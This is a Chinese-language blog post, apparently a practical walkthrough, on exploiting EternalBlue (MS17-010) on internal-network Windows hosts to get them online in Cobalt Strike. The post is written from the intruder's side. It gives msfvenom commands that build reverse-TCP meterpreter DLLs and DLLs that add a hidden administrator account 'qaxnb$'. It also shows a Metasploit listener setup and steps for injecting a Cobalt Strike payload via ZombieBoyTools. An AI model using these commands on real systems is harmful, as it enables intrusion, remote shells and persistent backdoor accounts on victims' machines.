永恒之蓝上线CS

简介: 该文介绍了在内网环境下,利用永恒之蓝漏洞(EternalBlue)将攻击者控制台(CS)上线的方法。前提条件是目标机器可上网、无防火墙和杀毒软件,并且存在永恒之蓝漏洞。使用Erebus插件的eterblue功能,通过MSF生成DLL文件,再利用永恒之蓝漏洞注入到目标系统中。文中给出了MSF生成不同平台DLL的命令,并详细说明了如何替换CS工具中的DLL文件,最后展示了在Double中选择目标IP和系统位数进行攻击,成功上线CS的截图。

永恒之蓝上线CS

内网有时候没办法了,有入口,但是处于一种尴尬的区域,需要扩大成果,眼前也只有几台永恒之蓝可以打了,没办法了,但是MSF又不太适合维持权限,于是想办法永恒之蓝上线CS。

前提要求:

1.目标机子出网

2.没有开启防火墙、杀软之类

3.存在永恒之蓝

Erebus插件

Erebus→pwn→eterblue

永恒之蓝上线CS

内网有时候没办法了,有入口,但是处于一种尴尬的区域,需要扩大成果,眼前也只有几台永恒之蓝可以打了,没办法了,但是MSF又不太适合维持权限,于是想办法永恒之蓝上线CS。

前提要求:

1.目标机子出网

2.没有开启防火墙、杀软之类

3.存在永恒之蓝

Erebus插件

Erebus→pwn→eterblue

image.png

image.png

tips

msf生成dll常见的命令

x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=5555 -f dll >x64.dll

x86

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll >xxx.dll

生成 x86的命令执行dll

msfvenom -p windows/exec cmd="net user qaxnb$ Qaxnb123. /add" exitfunc=process -a x86 -f dll > x86.dll

msfvenom -p windows/exec cmd="net localgroup administrators qaxnb$ /add" exitfunc=process -a x86 -f dll > x861.dll

生成x64命令执行dll

msfvenom -p windows/x64/exec cmd="net user qaxnb$ Qaxnb123. /add" exitfunc=process -a x64 -f dll > x64.dll

msf的监听

# use exploit/multi/handler

# set payload windows/x64/meterpreter/reverse_tcp

# set lhost 192.168.1.116

# set lport 5555

# exploit

永恒之蓝上线cs操作:

根据版本选择系统位数的raw

image.png

生成的payload.bin文件

image.png

然后利用msf生成对应的dll文件

要注意

64位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll
32位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -f dll -o x86.dll

生成的x64.dll文件

image.png

替换掉ZombieBoyTools中的x64.dll文件

image.png

Eternablue注意箭头的操作,如果出现win了,就没问题了。

image.png

Double中选好ip和系统位数然后点击Attack

image.png

CS成功上线

image.png

目录
相关文章
|
6天前
|
Shell 数据安全/隐私保护 Windows
MSF永恒之蓝使用
MSF永恒之蓝使用
34 0
|
6天前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
123 1
|
5月前
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
61 0
|
6月前
|
安全 开发工具 git
win10永恒之黑漏洞复现
win10永恒之黑漏洞复现
60 0
|
7月前
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
193 5
ms17-010(永恒之蓝)漏洞复现
|
12月前
|
安全 网络协议 网络安全
永恒之蓝Windows10版踩坑复现
永恒之蓝Windows10版踩坑复现
498 0
|
安全 网络安全 API
MS17-010永恒之蓝漏洞的浅谈与利用
MS17-010永恒之蓝漏洞的浅谈与利用
344 0
|
机器学习/深度学习 编解码 人工智能
「黑悟空」实机演示炸裂登场(2)
「黑悟空」实机演示炸裂登场
122 0
|
JavaScript Java Linux
Utools软件的使用教程又双叒叕更新了~
Utools软件的使用教程又双叒叕更新了~
723 0
Utools软件的使用教程又双叒叕更新了~
|
安全 测试技术 网络安全
微软EternalBlue永恒之蓝漏洞攻击测试
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396256 声明:仅供学习交流使用,个人实验笔记。
1619 0